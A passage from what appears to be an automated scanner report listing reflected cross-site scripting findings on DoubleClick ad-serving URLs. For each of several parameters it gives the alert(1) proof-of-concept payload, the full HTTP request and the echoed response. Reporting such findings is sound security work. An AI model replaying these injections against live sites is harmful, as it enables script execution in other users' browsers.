Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQcd9ac"-alert(1)-"804dc1ac7d6&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wm
...[SNIP]...

4.5. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89c50"-alert(1)-"67bab8d9fab was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-158317497655140589c50"-alert(1)-"67bab8d9fab&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-158317497655140589c50"-alert(1)-"67bab8d9fab&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...

4.6. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff2f0"-alert(1)-"b664736df25 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1ff2f0"-alert(1)-"b664736df25&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1ff2f0"-alert(1)-"b664736df25&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

4.7. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59253"-alert(1)-"0ba314982cd was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ59253"-alert(1)-"0ba314982cd&client=ca-pub-1583174976551405&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
I8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ59253"-alert(1)-"0ba314982cd&client=ca-pub-1583174976551405&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallows
...[SNIP]...

4.8. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28074"-alert(1)-"e33ce0f8330 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l28074"-alert(1)-"e33ce0f8330&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aec/f/187/%2a/p%3B239614135%3B0-0%3B0%3B62445283%3B4307-300/250%3B41553595/41571382/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l28074"-alert(1)-"e33ce0f8330&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIY
...[SNIP]...

4.9. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44f9b"-alert(1)-"e081a0b507f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=44f9b"-alert(1)-"e081a0b507f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7265
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 16 Apr 2011 15:40:05 GMT
Expires: Sat, 16 Apr 2011 15:40:05 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
xhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=44f9b"-alert(1)-"e081a0b507fhttp://turbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow =
...[SNIP]...

4.10. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75837"-alert(1)-"704dcbf347f was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE75837"-alert(1)-"704dcbf347f&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:38:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7283

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE75837"-alert(1)-"704dcbf347f&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wm
...[SNIP]...

4.11. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6772"-alert(1)-"80ae9066ab0 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912b6772"-alert(1)-"80ae9066ab0&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:39:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7283

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912b6772"-alert(1)-"80ae9066ab0&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...

4.12. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62c53"-alert(1)-"9354907b3e was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=162c53"-alert(1)-"9354907b3e&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:38:58 GMT
